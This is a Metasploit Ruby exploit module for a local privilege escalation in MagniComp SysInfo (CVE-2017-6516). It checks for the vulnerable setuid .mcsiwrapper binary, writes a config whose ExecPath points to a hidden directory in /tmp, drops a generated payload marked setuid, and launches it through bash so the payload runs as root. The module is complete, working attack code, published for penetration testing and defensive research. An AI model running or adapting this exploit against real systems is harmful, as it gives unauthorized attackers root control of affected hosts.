## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'MagniComp SysInfo mcsiwrapper Privilege Escalation', 'Description' => %q{ This module attempts to gain root privileges on systems running MagniComp SysInfo versions prior to 10-H64. The .mcsiwrapper suid executable allows loading a config file using the '--configfile' argument. The 'ExecPath' config directive is used to set the executable load path. This module abuses this functionality to set the load path resulting in execution of arbitrary code as root. This module has been tested successfully with SysInfo version 10-H63 on Fedora 20 x86_64, 10-H32 on Fedora 27 x86_64, 10-H10 on Debian 8 x86_64, and 10-GA on Solaris 10u11 x86. }, 'License' => MSF_LICENSE, 'Author' => [ 'Daniel Lawson', # Discovery and exploit 'Romain Trouve', # Discovery and exploit 'Brendan Coles' # Metasploit ], 'DisclosureDate' => 'Sep 23 2016', 'Platform' => %w(linux solaris), 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [ [ 'Automatic', { } ], [ 'Solaris', { 'Platform' => 'solaris', 'Arch' => ARCH_X86 } ], [ 'Linux', { 'Platform' => 'linux', 'Arch' => [ ARCH_X86, ARCH_X64 ]} ] ], 'References' => [ [ 'CVE', '2017-6516' ], [ 'BID', '96934' ], [ 'URL', 'http://www.magnicomp.com/support/cve/CVE-2017-6516.shtml' ], [ 'URL', 'https://labs.mwrinfosecurity.com/advisories/magnicomps-sysinfo-root-setuid-local-privilege-escalation-vulnerability/' ], [ 'URL', 'https://labs.mwrinfosecurity.com/advisories/multiple-vulnerabilities-in-magnicomps-sysinfo-root-setuid/' ] ] )) register_options( [ OptString.new('SYSINFO_DIR', [ true, 'Path to SysInfo directory', '/opt/sysinfo' ]), OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) ]) end def sysinfo_dir datastore['SYSINFO_DIR'] end def check unless cmd_exec("test -d #{sysinfo_dir} && echo true").include? 'true' vprint_good "Directory '#{sysinfo_dir}' does not exist" return CheckCode::Safe end vprint_good "Directory '#{sysinfo_dir}' exists" mcsiwrapper_path = "#{sysinfo_dir}/bin/.mcsiwrapper" unless setuid? mcsiwrapper_path vprint_error "#{mcsiwrapper_path} is not setuid" return CheckCode::Safe end vprint_good "#{mcsiwrapper_path} is setuid" bash_path = cmd_exec 'which bash' unless bash_path.start_with?('/') && bash_path.include?('bash') vprint_error 'bash is not installed. Exploitation will fail.' return CheckCode::Safe end vprint_good 'bash is installed' config_version = cmd_exec "grep ProdVersion= #{sysinfo_dir}/config/mcsysinfo.cfg" version = config_version.scan(/^ProdVersion=(\d+-H\d+|\d+-GA)$/).flatten.first if version.blank? vprint_error 'Could not determine the SysInfo version' return CheckCode::Detected end if Gem::Version.new(version.sub('-H', '.')) >= Gem::Version.new('10.64') vprint_error "SysInfo version #{version} is not vulnerable" return CheckCode::Safe end vprint_good "SysInfo version #{version} is vulnerable" CheckCode::Vulnerable end def upload(path, data) print_status "Writing '#{path}' (#{data.size} bytes) ..." rm_f path write_file path, data register_file_for_cleanup path end def mkdir(path) vprint_status "Creating '#{path}' directory" cmd_exec "mkdir -p #{path}" register_dir_for_cleanup path end def exploit check_status = check if check_status != CheckCode::Vulnerable && check_status != CheckCode::Detected fail_with Failure::NotVulnerable, 'Target is not vulnerable' end # Set target uname = cmd_exec 'uname' vprint_status "Operating system is #{uname}" if target.name.eql? 'Automatic' case uname when /SunOS/i my_target = targets[1] when /Linux/i my_target = targets[2] else fail_with Failure::NoTarget, 'Unable to automatically select a target' end else my_target = target end print_status "Using target: #{my_target.name}" # Check payload if (my_target['Platform'].eql?('linux') && payload_instance.name !~ /linux/i) || (my_target['Platform'].eql?('solaris') && payload_instance.name !~ /solaris/i) fail_with Failure::BadConfig, "Selected payload '#{payload_instance.name}' is not compatible with target operating system '#{my_target.name}'" end # Create a working directory base_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric rand(5..10)}" mkdir base_path # Write config file config_path = "#{base_path}/#{rand_text_alphanumeric rand(5..10)}" upload config_path, "ExecPath=#{base_path}" # Upload payload payload_name = rand_text_alphanumeric rand(5..10) payload_path = "#{base_path}/#{payload_name}" upload payload_path, generate_payload_exe cmd_exec "chmod u+sx '#{payload_path}'" print_status 'Executing payload...' # Executing .mcsiwrapper directly errors: # Command ".mcsiwrapper" cannot start with `.' or contain `/'. # Instead, we execute with bash to replace ARGV[0] with the payload file name output = cmd_exec "bash -c \"exec -a #{payload_name} #{sysinfo_dir}/bin/.mcsiwrapper --configfile #{config_path}&\"" output.each_line { |line| vprint_status line.chomp } end end